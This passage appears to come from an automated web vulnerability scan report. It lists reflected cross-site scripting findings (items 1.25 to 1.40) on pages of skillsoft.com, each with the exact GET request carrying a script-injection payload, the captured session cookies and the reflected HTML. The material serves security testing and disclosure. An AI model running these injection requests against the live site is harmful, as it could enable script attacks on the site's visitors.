Content-Length: 40884
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/credit_programs/Default.asp?10ed9"><script>alert(1)</script>3597c79e6d7=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.25. http://skillsoft.com/about/credit_programs/academic_credit_programs/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/credit_programs/academic_credit_programs/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a11e0"><script>alert(1)</script>90a67085b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/credit_programs/academic_credit_programs/default.asp?a11e0"><script>alert(1)</script>90a67085b8d=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43043
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/credit_programs/academic_credit_programs/default.asp?a11e0"><script>alert(1)</script>90a67085b8d=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.26. http://skillsoft.com/about/credit_programs/credential_programs/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/credit_programs/credential_programs/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e5a"><script>alert(1)</script>bcae9721eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/credit_programs/credential_programs/default.asp?a6e5a"><script>alert(1)</script>bcae9721eef=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41613
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/credit_programs/credential_programs/default.asp?a6e5a"><script>alert(1)</script>bcae9721eef=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.27. http://skillsoft.com/about/customers.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/customers.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf582"><script>alert(1)</script>957bccd228d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/customers.asp?cf582"><script>alert(1)</script>957bccd228d=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40275
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/customers.asp?cf582"><script>alert(1)</script>957bccd228d=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.28. http://skillsoft.com/about/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3a5"><script>alert(1)</script>41ed2bafdb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/default.asp?2b3a5"><script>alert(1)</script>41ed2bafdb4=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44070
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/default.asp?2b3a5"><script>alert(1)</script>41ed2bafdb4=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.29. http://skillsoft.com/about/future_direction.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/future_direction.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac53"><script>alert(1)</script>96153b585d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/future_direction.asp?5ac53"><script>alert(1)</script>96153b585d4=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41218
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/future_direction.asp?5ac53"><script>alert(1)</script>96153b585d4=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.30. http://skillsoft.com/about/instructional_design.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/instructional_design.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74a10"><script>alert(1)</script>8d77d024198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/instructional_design.asp?74a10"><script>alert(1)</script>8d77d024198=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42795
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/instructional_design.asp?74a10"><script>alert(1)</script>8d77d024198=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.31. http://skillsoft.com/about/management_team.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/management_team.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66073"><script>alert(1)</script>bd2c0fc8468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/management_team.asp?66073"><script>alert(1)</script>bd2c0fc8468=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51627
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/management_team.asp?66073"><script>alert(1)</script>bd2c0fc8468=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.32. http://skillsoft.com/about/office_locations.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/office_locations.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e926d"><script>alert(1)</script>ec17a6b6c94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/office_locations.asp?e926d"><script>alert(1)</script>ec17a6b6c94=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45466
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/office_locations.asp?e926d"><script>alert(1)</script>ec17a6b6c94=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.33. http://skillsoft.com/about/partners/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6eb"><script>alert(1)</script>091904ce8e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/partners/?cf6eb"><script>alert(1)</script>091904ce8e4=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42362
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/partners/Default.asp?cf6eb"><script>alert(1)</script>091904ce8e4=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.34. http://skillsoft.com/about/partners/IT/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/IT/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e085"><script>alert(1)</script>a191c9cb0b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/partners/IT/default.asp?7e085"><script>alert(1)</script>a191c9cb0b2=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41479
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/partners/IT/default.asp?7e085"><script>alert(1)</script>a191c9cb0b2=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.35. http://skillsoft.com/about/partners/channel/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/channel/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf61"><script>alert(1)</script>044393a25e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/partners/channel/default.asp?9bf61"><script>alert(1)</script>044393a25e7=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43255
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/partners/channel/default.asp?9bf61"><script>alert(1)</script>044393a25e7=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.36. http://skillsoft.com/about/partners/solutionpartners/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/solutionpartners/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a93"><script>alert(1)</script>4379b1e7840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/partners/solutionpartners/default.asp?39a93"><script>alert(1)</script>4379b1e7840=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43762
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/partners/solutionpartners/default.asp?39a93"><script>alert(1)</script>4379b1e7840=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.37. http://skillsoft.com/about/press_room/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d91ea"><script>alert(1)</script>2a148354c45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press_room/?d91ea"><script>alert(1)</script>2a148354c45=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40778
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/press_room/Default.asp?d91ea"><script>alert(1)</script>2a148354c45=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.38. http://skillsoft.com/about/press_room/in_the_news.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/in_the_news.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc940"><script>alert(1)</script>24fee44c4cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press_room/in_the_news.asp?bc940"><script>alert(1)</script>24fee44c4cf=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92836
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/press_room/in_the_news.asp?bc940"><script>alert(1)</script>24fee44c4cf=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.39. http://skillsoft.com/about/press_room/press_releases/December_09_10_Awards.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_09_10_Awards.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5feed"><script>alert(1)</script>e48f5886a1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press_room/press_releases/December_09_10_Awards.asp?5feed"><script>alert(1)</script>e48f5886a1b=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48655
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/press_room/press_releases/December_09_10_Awards.asp?5feed"><script>alert(1)</script>e48f5886a1b=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.40. http://skillsoft.com/about/press_room/press_releases/December_10_10_Financials.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_10_10_Financials.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31eb6"><script>alert(1)</script>11217fc0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press_room/press_releases/December_10_10_Financials.asp?31eb6"><script>alert(1)</script>11217fc0150=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

